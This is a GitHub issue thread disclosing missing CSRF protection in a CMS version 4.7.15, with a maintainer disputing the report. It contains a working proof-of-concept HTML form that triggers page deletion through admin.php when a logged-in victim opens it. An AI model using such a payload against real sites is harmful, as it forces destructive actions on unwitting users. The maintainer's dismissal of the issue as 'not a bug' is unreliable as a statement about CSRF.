CSRF Application Wide

Question

CSRF Application Wide

devansh3008 opened this issue 2 years ago · comments

Devansh Bordia commented 2 years ago

I have found multiple CSRF Issues on following version: 4.7.15

There is no use of Anticrsf token and Same site cookie being used. All endpoints are vulnerable even 4.7.16-dev4.

Only user needs to be logged in (no password is required to perform this issue)

Valid POC: (exploit.html)

<html><head>
<title>CSRF PoC - Generated By AppSec Labs csrf-generator</title>
</head><body>
<form action="http://localhost/admin.php?action=deletepage&var1=csrf" method="GET">
<input type="text" name="action" value="deletepage" /><br />
<input type="text" name="var1" value="csrf" /><br />
<input type='submit' value='Go!' />
</form>
</body>
</html>

Click on this html page and you can see you delete page/trashcan objects. The issue is being reported by me on huntr.io. I am adding this as reference for you to go over the images.

Bas Steelooper · Answer 1 · Mon Feb 20 2023 18:20:05 GMT+0800 (China Standard Time)

This is not a bug, this is doing something as an authenticated user. This is not possible remotely, or when you are not logged on.

Devansh Bordia · Answer 2 · Mon Feb 20 2023 18:30:44 GMT+0800 (China Standard Time)

The CSRF Issue requires an victim user to be authenticated. When he clicks on html poc, the exploit would be executed. Thanks, Devansh

…

On Mon, Feb 20, 2023, 15:50 Bas Steelooper ***@***.***> wrote: This is not a bug, this is doing something as an authenticated user. This is not possible remotely, or when you are not logged on. — Reply to this email directly, view it on GitHub <#116 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AHL2OPOM4UQT2W36RVL3GNLWYNAN7ANCNFSM5PQXODWQ> . You are receiving this because you authored the thread.Message ID: ***@***.***>